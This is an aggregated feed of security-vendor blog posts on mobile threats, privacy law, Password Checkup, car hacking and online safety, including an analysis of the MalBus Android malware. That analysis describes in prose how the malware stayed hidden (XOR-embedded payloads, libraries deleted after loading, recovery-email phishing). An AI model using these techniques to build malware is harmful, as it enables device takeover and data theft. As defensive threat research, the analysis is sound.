      Using public Wi-Fi is one of the most common attack vectors for cybercriminals today. With free public Wi-Fi widely available in larger cities, it has become a convenient way to access online accounts, check emails, and catch up on work while on the go. The industry has seen network spoofing increase dramatically in the past year. To put this into perspective, picture a hacker setting up a rogue access point in a public place like your local bank. A hacker will wait for you to connect to Wi-Fi that you think is a trusted network. Once the hacker gains access, they’re connected to your mobile device. They’ll watch remotely as you access sensitive information, revealing log-in credentials, confidential documents, and more.

      Whether you are at home or working remotely, network security needs to be a high priority.

      Device Attacks

      Cybercriminals have various ways of enticing users to install malware on their mobile devices. Ad and click fraud is a growing concern for device attacks, where criminals can gain access to a company’s internal network by sending an SMS phish. These types of phishing attempts may start as adware, but can easily spread to spyware to the entire botnet.

      Another growing concern with mobile device threats is when malware is hidden in other IoT devices and the information obtained by the hacker can be used as an entry point to your mobile device or your company network. With IoT malware families rapidly being customized and developed, it’s important for users to be aware and know how to protect themselves.

      How to Better Protect Your Mobile Device

       

      Mobile devices have all the organizational information that traditional endpoints have. McAfee® MVISION Mobile lets you protect against threats to your employees and your data on iOS and Android devices like you do on your PCs. With MVISION Mobile, you can manage the defense of your mobile devices alongside your PCs, IoT devices, servers, and cloud workloads inside McAfee ePolicy Orchestrator (McAfee ePO) with unified visibility into threats, integrated compliance reporting, and threat response orchestration.

      The most comprehensive mobile device security is on the device itself, and MVISION Mobile delivers unparalleled on-device protection. Visit our web site for more information, and a product tour.

      The post Your Mobile Phone: Friend or Foe? appeared first on McAfee Blogs.

      Ohio Senate Bill 220 Incentivizes Businesses to Maintain Higher Levels of Cybersecurity

      Veracode Ohio SB 220 Data Protection Act

      In the last two years alone, there has been a number of high-profile breaches that have given organizations pause, asking them to consider whether the same kind of event could happen to them. After all, a cybersecurity breach could seriously damage or even level your business if you’re not prepared and do not have the appropriate security programs in place. We’ve seen the implementation of the NYDFS Cybersecurity Regulation, and recent breaches have led to serious fines, potentially in the billions, for violating GDPR.

      Most recently, we saw the Ohio Senate Bill 220 (S.B. 220) signed into law and go into effect as of Nov. 2, 2018. S.B. 220, known as the Data Protection Act, serves as an incentive to businesses to ensure that they achieve and maintain a higher level of security by maintaining industry-standard cybersecurity programs.

      Recent research has shown that the average cost of a data breach globally is $3.86 million – an increase of 6.4 percent from 2017. As data breaches are growing in prevalence and the cost to organizations continue to rise, S.B. 220 serves as a legal “safe harbor” for firms operating in Ohio, if they’re sued for negligently failing to implement reasonable information security controls resulting in a data breach. The organization can use its compliance with the cybersecurity control as an affirmative defense, assuming it is in compliance with one of eight industry frameworks:

      • NIST SP 800-171
      • NIST SP 800-53 and 800-53(a)
      • The Federal Risk and Authorization Management Program (FedRAMP)
      • Center for Internet Security (CIS) Critical Security Controls
      • The ISO 27000 Family
      • The HIPAA Security Rule
      • Graham-Leach-Bliley Act
      • The Federal Information Security Modernization Act (FISMA)

      It is important to note that the Data Protection Act “does not, and is not intended to, create a minimum cybersecurity standard that must be achieved,” and it is not to “be read to impose liability upon businesses that do not obtain or maintain” a cybersecurity program that is compliant with one of the eight recognized frameworks listed above. In fact, the bill highlights that there is no silver-bullet approach to cybersecurity, and in order for an organization to call upon the “safe harbor,” it needs to have a program with a scope and scale appropriate to factors like the size and nature of the business, and the level of personally identifiable information it collects and carries.

      In the end, it pays for companies to implement proper cybersecurity programs, because it reduces the risk of breach and it mitigates legal risk if a breach occurs. At the same time, cybersecurity protections are still evolving, and organizations are starting to understand that when they focus solely on network security, web application firewalls, or data leakage prevention tools, they are leaving vulnerable a key attack surface: its web applications.

      The past few years have seen a marked increase in the number and severity of successful attacks aimed at the application layer, and our State of Software Security report has shown that 85 percent of applications have at least one vulnerability on initial scan. To begin implementing an AppSec program that scales to the size and needs of your organization – and reduces the risk associated with building, buying, and borrowing software – download our Ultimate Guide to Getting Started with Application Security.

      Customers Blame Companies not Hackers for Data Breaches

      RSA Security latest search reveals over half (57%) of consumers blame companies ahead of hackers if their data is stolen. Consumer backlash in response to the numerous high-profile data breaches in recent years has exposed one of the hidden risks of digital transformation: loss of customer trust.

      The RSA Data Privacy & Security Survey 2019 identified that companies have lost the trust of customers as a disconnect has formed between how companies are using customer data and how consumers expect their data to be used.

      Despite the fact that consumers harbour heightened concerns about their privacy, they continue to exhibit poor cyber hygiene, with 83% of users admitting that they reuse the same passwords across many sites, leaving them more vulnerable.

      Key takeaways from the RSA Data Privacy study, include:

      • Context matters: Individuals across all demographics are concerned about their financial/banking data, as well as sensitive information such as passwords, but other areas of concern vary dramatically by generation, nationality and even gender. For example, younger demographics are more comfortable with their data being used and collected than older survey respondents. 
      • Privacy expectations are cultural: Consumers respond to data privacy differently based on their nationality due to cultural factors, current events and high-profile data breaches in their respective countries. For example, in the months of the GDPR being implemented, German attitudes shifted in favour of stricter data privacy expectations, with 42% wanting to protect location data in 2018 versus only 29 percent in 2017.
      • Personalisation remains a puzzle: Countless studies have demonstrated that personalised experiences increase user activity and purchasing. However, the survey results showed that respondents do not want personalized services at the expense of their privacy. In fact, a mere 17% of respondents view tailored advertisements as ethical, and only 24% believe personalisation to create tailored newsfeeds is ethical. 
      “With a growing number of high-profile data breaches, questions around the ethical use of data and privacy missteps, consumers increasingly want to know how their data is being collected, managed and shared,” said Nigel Ng, Vice President of International, RSA. “Now is the time for organisations to evaluate their growing digital risks, doubling down on customer privacy and security. Today’s leaders must be vigilant about transforming their cybersecurity postures to manage today’s digital risks in a way that ensures consumer trust and confidence in their business.

      EU recalls children’s smartwatch over data fears

      European commission says Enox Safe-Kid-One can easily be hacked and poses risk to children

      A children’s wristwatch that allows the wearer to be easily contacted and located has been recalled by Brussels over safety fears.

      The European commission said the Enox Safe-Kid-One, which comes fitted with a global positioning system (GPS), a microphone and speaker, posed a serious risk to children.

      Related: Democracy is under threat from the malicious use of technology. The EU is fighting back | Julian King

      Children and tech

      Continue reading...

      Should you pull your smart plug?

      While some may think, “why would I need my toaster to connect to the internet,” smart home devices continue to become more and more popular. In fact, a recent study by Intel found that by 2025, 71% of Americans will have at least one smart device in their home. For many that aren’t ready to replace their favorite “dumb” appliances, smart plugs are an easy and affordable way to connect anything. But, do they leave your virtual “front door” wide open for cybercriminals? 

      In the latest episode of “Hackable?” our host Geoff Siskind and the team investigate just how risky smart plugs are for homeowners. Can just one weak link compromise your entire home network? To find out, Geoff invites a white-hat to hack the smart plug in his studio. Learn if your smart home and devices are at risk.      
       

      Listen now to the award-winning podcast “Hackable?” on Apple Podcasts!     

       

       


      The post Should you pull your smart plug? appeared first on McAfee Blogs.

      Should you pull your smart plug?

      While some may think, “why would I need my toaster to connect to the internet,” smart home devices continue to become more and more popular. In fact, a recent study by Intel found that by 2025, 71% of Americans will have at least one smart device in their home. For many that aren’t ready to replace their favorite “dumb” appliances, smart plugs are an easy and affordable way to connect anything. But, do they leave your virtual “front door” wide open for cybercriminals? 

      In the latest episode of “Hackable?” our host Geoff Siskind and the team investigate just how risky smart plugs are for homeowners. Can just one weak link compromise your entire home network? To find out, Geoff invites a white-hat to hack the smart plug in his studio. Learn if your smart home and devices are at risk.      
       

      Listen now to the award-winning podcast “Hackable?” on Apple Podcasts!     

       

       


      The post Should you pull your smart plug? appeared first on McAfee Blogs.

      Australian Cybersecurity Firm Experiences Exciting Times as Clients’ Shift to Cloud Accelerates

      Patrick Butler, CEO of the Australian cybersecurity firm Loop Secure, is excited about how the cloud is growing his business. His clients are enthused too by the tremendous opportunities and advantages the cloud presents. They’re also a little scared.

      “Every year more companies are digitizing all aspects of their business—from manufacturing plants coming online to new ways of serving up information to customers,” says Butler, whose firm provides a full range of cybersecurity services, from one-time red team engagements to managing security operations, primarily for midsize enterprises. “It’s exciting what technology can do to transform what we do with computers. … We’re seeing a huge uptake in collaboration technology, with a lot of customers moving to AWS [Amazon Web Services].”

      But Butler acknowledges his clients’ fears—putting sensitive data in the cloud introduces new risks. “Our job is to help customers leverage digital transformation positively without having to worry about the risks, [such as] breaches and brand reputation damage,” he says. “We’ve had to focus on how we protect them in [the cloud and] those areas of their business—areas that have traditionally been quite dark.”

      The Challenge of Securing the Cloud

      “Setting up security for the cloud can be quite technical,” Butler explains. “There are a lot of configuration options. … Yes, the cloud brings a lot of speed and scale, but one wrong configuration and suddenly you have an AWS S3 bucket available to the broader public with all of your confidential information on it. The cloud brings benefits, but it also brings new and different risks.”

      Confidently Securing the Cloud with Help from McAfee

      As one of the longest-running cybersecurity companies in Australia, Loop Secure has been a McAfee partner for over a decade. For its clients moving operations into the cloud, the firm primarily uses McAfee solutions to help them reach their security objectives—easily and effectively. For instance, for a midsize services client, Loop Secure implemented McAfee® Virtual Network Security Platform (McAfee vNSP), a complete network threat and intrusion prevention system (IPS) built for the unique demands of private and public clouds. Using McAfee vNSP allowed the company to apply the same robust security policies to endpoints within AWS as on premises.

      “What McAfee brings to the table is a comprehensive portfolio, scale, and focus,” Butler explains. “Like us, McAfee focuses only on cybersecurity. That’s important. … To us, the McAfee ‘Together is Power’ mantra means that with McAfee we have a broader team—our people plus McAfee people and products—all dedicated to keeping our clients’ data and environments safe.”

      Many of Butler’s clients use McAfee endpoint, networking, and/or web protection solutions and McAfee ePolicy Orchestrator® (McAfee ePO™). In the near future, Butler looks forward to offering them McAfee MVISION, an innovative, integrated, open system from device to cloud. McAfee MVISION could simplify security for these Loop Secure customers by providing consolidated visibility, comprehension, and control across their entire digital estate.

      With the acceleration of cloud adoption by its clients and McAfee’s device-to-cloud approach, “The future’s pretty exciting for both us and McAfee,” Butler says.

      View below for a short video interview with Patrick Butler. Get your questions answered by tweeting @McAfee_Business.

      The post Australian Cybersecurity Firm Experiences Exciting Times as Clients’ Shift to Cloud Accelerates appeared first on McAfee Blogs.

      Facebook’s Plans to Merge Messaging Platforms: What This Means for Online Safety

      Integration: it seems to be all the rage. As technology becomes more sophisticated, we sprint to incorporate these new innovations into our everyday lives. But as we celebrate Safer Internet Day, one can’t help but wonder, is all integration good when it comes to information shared online? Major privacy concerns have been raised surrounding Facebook’s recent plans to merge Messenger, WhatsApp, and Instagram. This integration will allow cross-messaging between the three platforms (which will all still operate as standalone apps), so users could talk to their Messenger-only friends without leaving WhatsApp.

      While Facebook’s plans to merge the messaging platforms are not yet finalized, the company is in the process of rebuilding the underlying infrastructure so that users who might utilize only one of the apps will be able to communicate with others within the company’s ecosystem. Facebook plans to include end-to-end encryption for the apps, ensuring that only the participants of a conversation can view the messages being sent. By allowing each app to speak to one another across platforms, Facebook hopes users become more engaged and use this as their primary messaging service.

      But Facebook’s messaging changes have greater implications for online safety as consumers become more protective of their data. For example, WhatsApp only requires a phone number to sign up for the app while Facebook asks users to verify their identities. Will this force more data to be shared with WhatsApp, or will its encryption become less secure? While nothing has been finalized, it’s important for users to think about how the information they share online could be affected by this merge.

      Although the internet has paved the way for advancements in social media and technology in general, users need to make sure they’re aware of the potential risks involved. And while this merge hasn’t happened yet, Safer Internet Day helps remind us to make good choices when it comes to browsing online. Following these tips can help keep you and your data safe and secure:

      • Get selective about what you share. Although social media is a great way to keep your friends and family in the loop on your daily life, be conservative about the information you put on the internet. Additionally, be cautious of what you send through messaging platforms, especially when it comes to your personally identifiable information.
      • Update your privacy settings. To make sure that you’re sharing your status with just your intended audience, check your privacy settings. Choose which apps you wish to share your location with and turn your profiles to private if you don’t want all users to have access to your information.
      • Keep your apps up-to-date. Keeping your social media apps updated can prevent exposure to threats brought on by software bugs. Turn on automatic updates so you always have the latest security patches, and make sure that your security software is set to run regular scans.
      • Click with caution. Cybercriminals can leverage social media messaging to spread phishing links. Don’t interact with users or messages that seem suspicious and keep your guard up by blocking unfamiliar users who try to send you sketchy content.
      • Stay secure while you browse online. Security solutions like McAfee WebAdvisor can help block malware and phishing sites if you accidentally click on a malicious link. This can help protect you from potential threats when you access your social channels from a desktop or laptop.

      And, as always, stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

      The post Facebook’s Plans to Merge Messaging Platforms: What This Means for Online Safety appeared first on McAfee Blogs.

      Protect your accounts from data breaches with Password Checkup



      Update (Feb 6): We have updated the post to clarify a protocol used in the design is centered around private set intersection.

      Google helps keep your account safe from hijacking with a defense in depth strategy that spans prevention, detection, and mitigation. As part of this, we regularly reset the passwords of Google accounts affected by third-party data breaches in the event of password reuse. This strategy has helped us protect over 110 million users in the last two years alone. Without these safety measures, users would be at ten times the risk of account hijacking.

      We want to help you stay safe not just on Google, but elsewhere on the web as well. This is where the new Password Checkup Chrome extension can help. Whenever you sign in to a site, Password Checkup will trigger a warning if the username and password you use is one of over 4 billion credentials that Google knows to be unsafe.

      Password Checkup was designed jointly with cryptography experts at Stanford University to ensure that Google never learns your username or password, and that any breach data stays safe from wider exposure. Since Password Checkup is an early experiment, we’re sharing the technical details behind our privacy preserving protocol to be transparent about how we keep your data secure.

      Key design principles

      We designed Password Checkup with three key principles in mind:

      • Alerts are actionable, not informational: We believe that an alert should provide concise and accurate security advice. For an unsafe account, that means resetting your password. While it’s possible for data breaches to expose other personal data such as a phone number or mailing address, there’s no straightforward next step to re-securing that data. That’s why we focus only on warning you about unsafe usernames and passwords.
      • Privacy is at the heart of our design: Your usernames and passwords are incredibly sensitive. We designed Password Checkup with privacy-preserving technologies to never reveal this personal information to Google. We also designed Password Checkup to prevent an attacker from abusing Password Checkup to reveal unsafe usernames and passwords. Finally, all statistics reported by the extension are anonymous. These metrics include the number of lookups that surface an unsafe credential, whether an alert leads to a password change, and the web domain involved for improving site compatibility.
      • Advice that avoids fatigue: We designed Password Checkup to only alert you when all of the information necessary to access your account has fallen into the hands of an attacker. We won’t bother you about outdated passwords you’ve already reset or merely weak passwords like “123456”. We only generate an alert when both your current username and password appear in a breach, as that poses the greatest risk.
      Settling on an approach

      At a high level, Password Checkup needs to query Google about the breach status of a username and password without revealing the information queried. At the same time, we need to ensure that no information about other unsafe usernames or passwords leaks in the process, and that brute force guessing is not an option. Password Checkup addresses all of these requirements by using multiple rounds of hashing, k-anonymity, and private set intersection with blinding.

      Our approach strikes a balance between privacy, computation overhead, and network latency. While single-party private information retrieval (PIR) and 1-out-of-N oblivious transfer solve some of our requirements, the communication overhead involved for a database of over 4 billion records is presently intractable. Alternatively, k-party PIR and hardware enclaves present efficient alternatives, but they require user trust in schemes that are not widely deployed yet in practice. For k-party PIR, there is a risk of collusion; for enclaves, there is a risk of hardware vulnerabilities and side-channels.

      A look under the hood

      Here’s how Password Checkup works in practice to satisfy our security and privacy requirements.


      Protecting your accounts

      Password Checkup is currently available as an extension for Chrome. Since this is a first version, we will continue refining it over the coming months, including improving site compatibility and username and password field detection.

      Acknowledgements

      This post reflects the work of a large group of Google engineers, research scientists, and others including: Niti Arora, Jacob Barrett, Borbala Benko, Alan Butler, Abhi Chaudhuri, Oxana Comanescu, Sunny Consolvo, Michael Dedrick, Kyler Emig, Mihaela Ion, Ilona Gaweda, Luca Invernizzi, Jozef Janovský, Yu Jiang, Patrick Gage Kelly, Nirdhar Khazanie, Guemmy Kim, Ben Kreuter, Valentina Lapteva, Maija Marincenko, Grzegorz Milka, Angelika Moscicki, Julia Nalven, Yuan Niu, Sarvar Patel, Tadek Pietraszek, Ganbayar Puntsagdash, Ananth Raghunathan, Juri Ranieri, Mark Risher, Masaru Sato, Karn Seth, Juho Snellman, Eduardo Tejada, Tu Tsao, Andy Wen, Kevin Yeo, Moti Yung, and Ali Zand.

      Automotive Technologies and Cyber Security

      A guest article authored by Giles Kirkland
      Giles is a car expert and dedicated automotive writer with a great passion for electric vehicles, autonomous cars and other innovative technologies. He loves researching the future of motorisation and sharing his ideas with auto enthusiasts across the globe. You can find him on Twitter, Facebook and at Oponeo.


      Automotive Technologies and Cyber Security
      Surveys show that about 50% of the UK feel that driverless vehicles will make their lives much easier and are eagerly anticipating the arrival of this exciting technology. Cities expect that when driverless car technology is fully implemented, the gridlock which now plagues their streets will be relieved to a large extent. Auto-makers predict that the new technology will encourage a surge in vehicle purchases, and technology companies are lining up with the major auto manufacturers to lend their experience and knowledge to the process, hoping to earn huge profits.



      Delays to Driverless Technology
      While some features of autonomous technology have already been developed and have been rolled out in various new vehicles, the full technology will probably not be mature for several decades yet. One of the chief holdups is in establishing the infrastructure necessary on the roads themselves and in cities, in order to safely enable driverless operation.

      The full weight of modern technology is pushing development along at a breakneck pace. Unlike safety testing of the past, where some real-life scenarios were simulated to anticipate vehicle reactions, high-powered simulators have now been setup to increase the rapidity at which vehicle software can 'learn' what to do in those real-life situations. This has enabled learning at a rate exponentially greater than any vehicle of the past, which is not surprising, since vehicles of the past were not equipped with 'brains' like autonomous cars will be.

      The Cyber Security aspect of Autonomous Vehicles
      Despite the enormous gains that will come from autonomous vehicles, both socially and economically, there will inevitably be some problems which will arise, and industry experts agree that the biggest of these threats is cyber security. In 2015, there was a famous incident which dramatically illustrated the possibilities. In that year, white-collar hackers took control of a Jeep Cherokee remotely by hacking into its Uconnect Internet-enabled software, and completely cut off its connection with the Internet. This glaring shortcoming caused Chrysler to immediately recall more than one million vehicles, and provided the world with an alarming illustration of what could happen if someone with criminal intent breached the security system of a vehicle.

      Cars of today have as many as 100 Electronic Control Units (ECU's), which support more than 100 million coding lines, and that presents a huge target to the criminal-minded person. Any hacker who successfully gains control of a peripheral ECU, for instance the vehicle's Bluetooth system, would theoretically be able to assume full control of other ECU's which are responsible for a whole host of safety systems. Connected cars of the future will of course have even more ECU's controlling the vehicle's operations, which will provide even more opportunities for cyber attack.


      Defense against Cyber Attacks
      As scary as the whole cyber situation sounds, with the frightening prospect of complete loss of control of a vehicle, there is reason for thinking that the threat can be managed effectively. There are numerous companies already involved in research and development on how to make cars immune from attacks, using a multi-tiered defense system involving several different security products, installed on different levels of the car's security system.

      Individual systems and ECU's can be reinforced against attacks. Up one level from that, software protection is being developed to safeguard the vehicle's entire internal network. In the layer above that, there are already solutions in place to defend vehicles at the point where ECU's connect to external sources. This is perhaps the most critical area, since it represents the line between internal and external communications. The final layer of security comes from the cloud itself. Cyber threats can be identified and thwarted before they are ever sent to a car.

      The Cyber Security Nightmare
      If you ask an average person in the UK what the biggest problem associated with driverless cars is, they’d probably cite the safety issue. Industry experts however, feel that once the technology has been worked out, there will probably be less highway accidents and that driving safety will actually be improved. However, the nightmare of having to deal with the threat which always exists when anything is connected to the Internet, will always be one which is cause for concern.

      Safer Internet Day 2019 – Together for a Better Internet

      What You Can Do Today to Help Create a Better Internet

       

      Today is Safer Internet Day (SID) – an annual worldwide event to encourage us all to work together to create a better internet. Celebrated globally in over 130 countries, SID is an opportunity for millions of people worldwide to come together to inspire positive change and raise awareness about the importance of online safety.

      The theme for 2019 is: ‘Together for a Better Internet’ which I believe is a timely reminder of the importance of us all working together if we are serious about making the internet a safer place. Whether we are parents, carers, teachers or just avid users, we all have a part to play.

      The 4R’s of Online Safety

      In order to make a positive change to our online world, this year we are being encouraged to focus on four critical skills that many experts believe will help us all (especially our kids) better navigate the internet and create a more positive online environment. Let’s call them the 4R’s of online safety: Respect, Responsibility, Reasoning and Resilience. So, here is my advice on what we can do to try and incorporate these four important skills into our family’s digital lives

      1. Respect – ‘I treat myself and others the way I like to be treated’

      I firmly believe that having respect for others online is critical if we are going to foster a safer and more supportive internet for our children and future generations. While many parents realise that our constant reminders about the importance of good manners and respect must also now be extended to include the online world, not everyone is on the same page.

      Keyboard warriors who fire off abusive comments online, or harass and troll others clearly do not have any notion of online respect. Online actions can have serious real-world implications. In fact, online actions can often have more significant implications as the dialogue is not just contained to a few, rather it is witnessed by everyone’s online friends which could stretch into the 1000’s. Such public exchanges then create the opportunity for commentary which often further magnifies the hurt and fallout.

      It is therefore essential that we have very direct conversations with our children about what is and isn’t appropriate online. And if there is even any confusion, always revert to one of my favourite lessons from my Sunday School days: treat others how you would like to be treated yourself.

      1. Responsibility – ‘I am accountable for my actions and I take a stand when I feel something is wrong’

      In my opinion, teaching our kids online responsibility is another important step in making the internet a better place. Ensuring our kids understand that they are not only responsible but accountable for their behaviour is essential. If they harass or bully others online, or are involved in sending inappropriate pics, there are consequences that could quite possible include interactions with the police department.

      But being responsible online also means getting involved if you feel something isn’t right. Whether a mate is on the receiving end of online harassment or a cruel joke, getting involved and telling the perpetrator that their behaviour ‘isn’t cool’ is essential.

      1. Reasoning – ‘I question what is real’

      Teaching our kids to think critically is an essential survival skill for our kids in our content-driven online world. We need our kids to question, analyse and verify online content. They need to be able to identify reputable and credible sources and think carefully before they share and digest information.

      The best thing we can do as parents is challenge our kids and get them thinking! If for example, your child is researching online for a school assignment then get them thinking. Ask them what agenda the author of the article has. Ask them whether there is a counter argument to the one laid out in the article. Ask them whether the source sharing the information is trustworthy. The aim is to teach them to question and not take anything they find online at face value.

      1. Resilience – ‘I get back up from tough situations’

      Unfortunately, the chances that your child will experience some challenges online is quite high. Whether someone posts a mean comment, they are harassed, or worst case, cyberbullied – these nasty online interactions can really hurt.

      Ensuring your kids know that they can come to you about any issue they experience is essential. And you need to repeat this to them regularly, so they don’t forget! And if your child does come to you with a problem they experienced online, the worst thing you can do is threaten to disconnect them. If you do this, I guarantee you that they will never share anything else with you again.

      In 2014, Parent Zone, one of the UK’s leading family digital safety organisations collaborated with the Oxford Internet Institute to examine ways to build children’s online resilience. The resulting report, A Shared Responsibility: Building Children’s Online Resilience, showed that unconditional love and respect from parents, a good set of digital skills plus the opportunity for kids to take risks and develop strategies in the online world – without being overly micro-managed by their parents – were key to building online resilience.

      So, love them, educate them and give them some independence so they can start to take some small risks online and start developing resilience.

      What Can You Do this Safer Internet Day?

      Why not pledge to make one small change to help make the internet a better place this Safer Internet Day? Whether it’s modelling online respect, reminding your kids of their online responsibilities, challenging them to demonstrate reasoning when assessing online content or working with them to develop online resilience, just a few small steps can make a positive change.

       

       

       

       

       

      The post Safer Internet Day 2019 – Together for a Better Internet appeared first on McAfee Blogs.

      MalBus: Popular South Korean Bus App Series in Google Play Found Dropping Malware After 5 Years of Development

      McAfee’s Mobile Research team recently learned of a new malicious Android application masquerading as a plugin for a transportation application series developed by a South Korean developer. The series provides a range of information for each region of South Korea, such as bus stop locations, bus arrival times and so on. There are a total of four apps in the series, with three of them available from Google Play since 2013 and the other from around 2017. Currently, all four apps have been removed from Google Play while the fake plugin itself was never uploaded to the store. While analyzing the fake plugin, we were looking for initial downloaders and additional payloads – we discovered one specific version of each app in the series (uploaded at the same date) which was dropping malware onto the devices on which they were installed, explaining their removal from Google Play after 5 years of development.

      Figure 1. Cached Google Play page of Daegu Bus application, one of the apps in series

      When the malicious transportation app is installed, it downloads an additional payload from hacked web servers which includes the fake plugin we originally acquired. After the fake plugin is downloaded and installed, it does something completely different – it acts as a plugin of the transportation application and installs a trojan on the device, trying to phish users to input their Google account password and completely take control of the device. What is interesting is that the malware uses the native library to take over the device and also deletes the library to hide from detection. It uses names of popular South Korean services like Naver, KakaoTalk, Daum and SKT. According to our telemetry data, the number of infected devices was quite low, suggesting that the final payload was installed to only a small group of targets.

      The Campaign

      The following diagram explains the overall flow from malware distribution to device infection.

      Figure 2. Device infection process

      When the malicious version of the transportation app is installed, it checks whether the fake plugin is already installed and, if not, downloads from the server and installs it. After that, it downloads and executes an additional native trojan binary which is similar to the trojan which is dropped by the fake plugin. After everything is done, it connects with the C2 servers and handles received commands.

      Initial Downloader

      The following table shows information about the malicious version of each transportation app in the series. As the Google Play number of install stats shows, these apps have been downloaded on many devices.

      Unlike the clean version of the app, the malicious version contains a native library named “libAudio3.0.so”.

      Figure 3. Transportation app version with malicious native library embedded

      In the BaseMainActivity class of the app, it loads the malicious library and calls startUpdate() and updateApplication().

      Figure 4. Malicious library being loaded and executed in the app

      startUpdate() checks whether the app is correctly installed by checking for the existence of a specific flag file named “background.png” and whether the fake plugin is installed already. If the device is not already infected, the fake plugin is downloaded from a hacked web server and installed after displaying a toast message to the victim. updateApplication() downloads a native binary from the same hacked server and dynamically loads it. The downloaded file (saved as libSound1.1.so) is then deleted after being loaded into memory and, finally, it executes an exported function which acts as a trojan. As previously explained, this file is similar to the file dropped by the fake plugin which is discussed later in this post.

      Figure 5 Additional payload download servers

      Fake Plugin

      The fake plugin is downloaded from a hacked web server with file extension “.mov” to look like a media file. When it is installed and executed, it displays a toast message saying the plugin was successfully installed (in Korean) and calls a native function named playMovie(). The icon for the fake plugin soon disappears from the screen. The native function implemented in LibMovie.so, which is stored inside the asset folder, drops a malicious trojan to the current running app’s directory masquerading as libpng.2.1.so file. The dropped trojan is originally embedded in the LibMovie.so xor’ed, which is decoded at runtime. After giving permissions, the address of the exported function “Libfunc” in the dropped trojan is dynamically retrieved using dlsym(). The dropped binary in the filesystem is deleted to avoid detection and finally Libfunc is executed.

      Figure 6 Toast message when malware is installed

      In the other forked process, it tries to access the “naver.property” file on an installed SD Card, if there is one, and if it succeeds, it tries starting “.KaKaoTalk” activity which displays a Google phishing page (more on that in the next section) . The overall flow of the dropper is explained in the following diagram:

      Figure 7. Execution flow of the dropper

      Following is a snippet of a manifest file showing that “.KaKaoTalk” activity is exported.

      Figure 8. Android Manifest defining “.KaKaoTalk” activity as exported

      Phishing in JavaScript

      KakaoTalk class opens a local HTML file, javapage.html, with the user’s email address registered on the infected device automatically set to log into their account.

      Figure 9. KakaoTalk class loads malicious local html file

      The victim’s email address is set to the local page through a JavaScript function setEmailAddress after the page is finished loading. A fake Korean Google login website is displayed:

      Figure 10. The malicious JavaScript shows crafted Google login page with user account

      We found the following attempts of exploitation of Google legitimate services by the malware author:

      • Steal victim’s Google account and password
      • Request password recovery for a specific account
      • Set recovery email address when creating new Google account

      An interesting element of the phishing attack is that the malware authors tried to set their own email as the recovery address on Google’s legitimate services. For example, when a user clicks on the new Google account creation link in the phishing page, the crafted link is opened with the malware author’s email address as a parameter of RecoveryEmailAddress.

      Figure 11. The crafted JavaScript attempts to set recovery email address for new Google account creation.

      Fortunately for end users, none of the above malicious attempts are successful. The parameter with the malware author’s email address is simply ignored at the account creation stage.

      Trojan

      In addition to the Google phishing page, when “Libfunc” function of the trojan (dropped by the fake plugin or downloaded from the server) is executed, the mobile phone is totally compromised. It receives commands from the following hardcoded list of C2 servers. The main functionality of the trojan is implemented in a function called “doMainProc()”. Please note that there are a few variants of the trojanwith different functionality but, overall, they are pretty much the same.

      Figure 12. Hardcoded list of C2 servers

      The geolocation of hardcoded C2 servers lookslike the following:

      Figure 13. Location of C2 Servers

      Inside doMainProc(), the trojan receives commands from the C2 server and calls appropriate handlers. Part of the switch block below gives us an idea of what type of commands this trojan supports.

      Figure 14. Subset of command handlers implemented in the dropped trojan.

      As you can see, it has all the functionality that a normal trojan has. Downloading, uploading and deleting files on the device, leaking information to a remote server and so on. The following table explains supported C2 commands:

      Figure 15. C2 Commands

      Before entering the command handling loop, the trojan does some initialization, like sending device information files to the server and checking the UID of the device. Only after the UID checking returns a 1 does it enter the loop.

      Figure 16 Servers connected before entering command loop

      Among these commands, directory indexing in particular is important. The directory structure is saved in a file named “kakao.property” and while indexing the given path in the user device, it checks the file with specific keywords and if it matches, uploads the file to the remote upload server. These keywords are Korean and its translated English version is as per the following table:

      Figure 17 Search file keywords

      By looking at the keywords we can anticipate that the malware authors were looking for files related to the military, politics and so on. These files are uploaded to a separate server.

      Figure 18 Keyword matching file upload server

      Conclusion

      Applications can easily trick users into installing them before then leaking sensitive information. Also, it is not uncommon to see malware sneaking onto the official Google Play store, making it hard for users to protect their devices. This malware has not been written for ordinary phishing attempts, but rather very targeted attacks, searching the victim’s devices for files related to the military and politics, likely trying to leak confidential information. Users should always install applications that they can fully trust even though they are downloaded from trusted sources.

      McAfee Mobile Security detects this threat as Android/MalBus and alerts mobile users if it is present, while protecting them from any data loss. For more information about McAfee Mobile Security, visit https://www.mcafeemobilesecurity.com.

      Hashes (SHA-256)

      Initial Downloader (APK)
      • 19162b063503105fdc1899f8f653b42d1ff4fcfcdf261f04467fad5f563c0270
      • bed3e665d2b5fd53aab19b8a62035a5d9b169817adca8dfb158e3baf71140ceb
      • 3252fbcee2d1aff76a9f18b858231adb741d4dc07e803f640dcbbab96db240f9
      • e71dc11e8609f6fd84b7af78486b05a6f7a2c75ed49a46026e463e9f86877801

      Fake Plugin (APK)
      • ecb6603a8cd1354c9be236a3c3e7bf498576ee71f7c5d0a810cb77e1138139ec
      • b8b5d82eb25815dd3685630af9e9b0938bccecb3a89ce0ad94324b12d25983f0

      Trojan (additional payload)
      • b9d9b2e39247744723f72f63888deb191eafa3ffa137a903a474eda5c0c335cf
      • 12518eaa24d405debd014863112a3c00a652f3416df27c424310520a8f55b2ec
      • 91f8c1f11227ee1d71f096fd97501c17a1361d71b81c3e16bcdabad52bfa5d9f
      • 20e6391cf3598a517467cfbc5d327a7bb1248313983cba2b56fd01f8e88bb6b9

      The post MalBus: Popular South Korean Bus App Series in Google Play Found Dropping Malware After 5 Years of Development appeared first on McAfee Blogs.

      California Consumer Privacy Act

      This blog was written by Gerald Jones Jr.

      More sweeping privacy law changes are on the horizon as California law overhauls consumer protection and privacy rights.

      Shortly after the European Union’s watershed General Data Protection Regulation (GDPR) enforcement began on May 25, 2018, California passed its own privacy bill, the California Consumer Privacy Act of 2018 (CCPA), in June. Amid pressure to act or swallow a more stringent bill initiated by a private California resident, the CCPA broadens the scope of privacy rights for Californians. It includes data access rights and a limited private right of action, or the right to file a lawsuit.

      The CCPA takes effect in January 2020 (or July 2020, if the California Attorney General implements additional regulations) and is widely regarded as the foremost privacy law in the United States. Yet the CCPA may have broader implications. The range of companies falling within the Act’s scope, i.e., not just the usual suspects in the technology industry, might pressure Congress into enacting a federal privacy regime, which would pre-empt the CCPA.

      The Act grants consumers greater control over their personally identifiable information and prods companies doing business in the state to prioritize the practice of sound data governance. Here are some key takeaways under the CCPA:

      • It impacts companies doing business in California that meet one of the following thresholds:
